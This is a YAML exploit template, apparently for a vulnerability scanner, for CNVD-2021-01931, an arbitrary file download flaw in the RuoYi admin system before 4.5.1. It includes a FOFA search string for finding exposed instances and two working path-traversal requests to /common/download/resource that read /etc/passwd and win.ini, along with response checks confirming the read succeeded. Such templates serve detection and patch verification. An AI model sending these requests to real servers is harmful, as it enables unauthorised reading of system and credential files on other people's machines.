product: 若依管理系统
vName: 若依管理系统后台resource任意文件下载
type: 文件读取
vID:
  - CNVD-2021-01931
level: 3
vDesc: 若依管理系统是基于springboot的权限管理系统，登录后台后可以读取服务器上的任意文件。
version: RuoYi<4.5.1
note: ''
search:
  FOFA: app="若依-管理系统"
protocol: http
link: https://blog.51cto.com/u_16170213/6767703
fix:
  - 建议联系软件厂商进行处理
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /common/download/resource?resource=/profile/../../../../Windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and
  - exp:
      method: get
      follow: false
      path: /common/download/resource?resource=/profile/../../../../../../../etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:'
            logic: and